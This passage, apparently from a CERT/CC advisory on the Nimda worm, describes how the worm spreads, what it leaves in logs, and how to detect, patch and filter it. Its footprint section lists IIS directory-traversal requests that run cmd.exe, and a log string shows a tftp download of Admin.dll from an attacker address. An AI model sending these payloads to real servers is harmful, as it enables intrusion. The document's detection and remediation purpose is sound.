These files are passed through a simple pattern matcher which collects strings that look like email addresses. These addresses then receive a copy of the worm as a MIME-encoded email attachment. Nimda stores the time the last batch of emails were sent in the Windows registry, and every 10 days will repeat the process of harvesting addresses and sending the worm via email.

Likewise, the client machines begin scanning for vulnerable IIS servers. Nimda looks for backdoors left by previous IIS worms: Code Red II [IN-2001-09] and sadmind/IIS worm [CA-2001-11]. It also attempts to exploit various IIS Directory Traversal vulnerabilities (VU#111677 and CA-2001-12). The selection of potential target IP addresses follows these rough probabilities:

  • 50% of the time, an address with the same first two octets will be chosen
  • 25% of the time, an address with the same first octet will be chosen
  • 25% of the time, a random address will be chosen
The infected client machine attempts to transfer a copy of the Nimda code via tftp (69/UDP) to any IIS server that it scans and finds to be vulnerable.

Once running on the server machine, the worm traverses each directory in the system (including all those accessible through file shares) and writes a MIME-encoded copy of itself to disk using file names with .eml or .nws extensions (e.g., readme.eml). When a directory containing web content (e.g., HTML or ASP files) is found, the following snippet of Javascript code is appended to every one of these web-related files:

Example: Javascript snippet

This modification of web content allows further propagation of the worm to new clients through a web browser or through the browsing of a network file system.

In order to further expose the machine, the worm

  • enables the sharing of the c: drive as C$
  • creates a "Guest" account on Windows NT and 2000 systems
  • adds this account to the "Administrator" group.

Furthermore, the Nimda worm infects existing binaries on the system by creating Trojan horse copies of legitimate applications. These Trojan horse versions of the applications will first execute the Nimda code (further infecting the system and potentially propagating the worm), and then complete their intended function.

Browser Propagation

As part of the infection process, the Nimda worm modifies all web content files it finds (including, but not limited to, files with .htm, .html, and .asp extensions). As a result, any user browsing web content on the system, whether via the file system or via a web server, may download a copy of the worm. Some browsers may automatically execute the downloaded copy, thereby infecting the browsing system.

File System Propagation

The Nimda worm creates numerous MIME-encoded copies of itself (using file names with .eml and .nws extensions) in all writable directories (including those found on a network share) to which the user has access. If a user on another system subsequently selects the copy of the worm file on the shared network drive in Windows Explorer with the preview option enabled, the worm may be able to compromise that system.

Additionally, by creating Trojan horse versions of legitimate applications already installed on the system, users may unknowingly trigger the worm when attempting to make use of these programs.

System FootPrint

The scanning activity of the Nimda worm produces the following log entries for any web server listing on port 80/tcp:
GET /scripts/root.exe?/c+dir
                                    GET /MSADC/root.exe?/c+dir
                                    GET /c/winnt/system32/cmd.exe?/c+dir
                                    GET /d/winnt/system32/cmd.exe?/c+dir
                                    GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
                                    GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
                                    GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
                                    GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
                                    GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
                                    GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
                                    GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
                                    GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
                                    GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
                                    GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
                                    GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
                                    GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
                                    
Note: The first four entries in these sample logs denote attempts to connect to the backdoor left by Code Red II, while the remaining log entries are examples of exploit attempts for the Directory Traversal vulnerability.

II. Impact

Intruders can execute arbitrary commands within the LocalSystem security context on machines running the unpatched versions of IIS. In the case where a client is compromised, the worm will be run with the same privileges as the user who triggered it. Hosts that have been compromised are also at high risk for being party to attacks on other Internet sites.

The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected machines.

III. Solutions

Recommendations for System Administrators of IIS machines

To determine if your system has been compromised, look for the following:

  • a root.exe file (indicates a compromise by Code Red II or sadmind/IIS worms making the system vulnerable to the Nimda worm)
  • an Admin.dll file in the root directory of c:\, d:\, or e:\ (Note that the file name Admin.dll may be legitimately installed by IIS in other directories.)
  • unexpected .eml or .nws files in numerous directories
  • the presence of this string: /c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200 in the IIS logs, where "x.x.x.x" is the IP address of the attacking system. (Note that only the "200" result code indicates success of this command.)

The only safe way to recover from the system compromise is to format the system drive(s) and reinstall the system software from trusted media (such as vendor-supplied CD-ROM). Additionally, after the software is reinstalled, all vendor-supplied security patches must be applied. The recommended time to do this is while the system is not connected to any network. However, if sufficient care is taken to disable all server network services, then the patches can be downloaded from the Internet.

Detailed instructions for recovering your system can be found in the CERT/CC tech tip:

Steps for Recovering from a UNIX or NT System Compromise

Apply the appropriate patch from your vendor

A cumulative patch which addresses all of the IIS-related vulnerabilities exploited by the Nimda worm is available from Microsoft at

http://www.microsoft.com/technet/security/bulletin/MS01-044.asp

Recommendations for Network Administrators

Ingress filtering

Ingress filtering manages the flow of traffic as it enters a network under your administrative control. Servers are typically the only machines that need to accept inbound connections from the public Internet. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound connections to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound connections to non-authortized services. With Nimda, ingress filtering of port 80/tcp could prevent instances of the worm outside of your network from scanning or infecting vulnerable IIS servers in the local network that are not explicitly authorized to provide public web services. Filtering of port 69/udp will also prevent the downloading of the worm to IIS via tftp.

Cisco has published a tech tip specifically addressing filtering guidelines to mitigate the impact of the Nimda worm at

http://www.cisco.com/warp/public/63/nimda.shtml

Egress filtering

Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound connections to the Internet. In the case of Nimda, employing egress filtering on port 69/udp at your network border will prevent certain aspects of the worms propogation both to and from your network.

Recommendations for End User Systems

Apply the appropriate patch from your vendor

If you are running a vulnerable version of Internet Explorer (IE), the CERT/CC recommends upgrading to at least version 5.0 since older versions are no longer officially maintained by Microsoft. Users of IE 5.0 and above are encourage to apply patch for the "Automatic Execution of Embedded MIME Types" vulnerability available from Microsoft at

http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

Note: IE 5.5 SP1 users should apply the patches discussed in MS01-027

Run and Maintain an Anti-Virus Product

It is important for users to update their anti-virus software. Most anti-virus software vendors have released updated information, tools, or virus databases to help detect and partially recover from this malicious code. A list of vendor-specific anti-virus information can be found in Appendix A.

Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when available.

Don't open e-mail attachments

The Nimda worm may arrive as an email attachment named "readme.exe". Users should not open this attachment.

Disable JavaScript

End-user systems can become infected with the Nimda worm by browsing web sites hosted by infected servers. This method of infection requires the use of JavaScript to be successful. Therefore, the CERT/CC recommends that end user systems disable JavaScript until all appropriate patches have been applied and anti-virus software has been updated.

Appendix A. Vendor Information

Antivirus Vendor Information

Aladdin Knowledge Systems

http://www.eSafe.com/home/csrt/valerts2.asp?virus_no=10087

Central Command, Inc.

http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.php?
p_refno=010918-000005

Command Software Systems

http://www.commandsoftware.com/virus/nimda.html

Computer Associates

http://www.ca.com/virusinfo/encyclopedia/descriptions/n/nimda.htm

F-Secure Corp

http://www.fsecure.com/v-descs/nimda.shtml

McAfee

http://vil.mcafee.com/dispVirus.asp?virus_k=99209&

Panda Software

http://service.pandasoftware.es/library/card.jsp?Virus=Nimda

Proland Software

http://www.pspl.com/virus_info/worms/nimda.htm

Sophos

http://www.sophos.com/virusinfo/analyses/w32nimdaa.html

Symantec

http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

Trend Micro

http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A

References

You may wish to visit the CERT/CC's computer virus resources page located at

http://www.cert.org/other_sources/viruses.html

HOME

HOME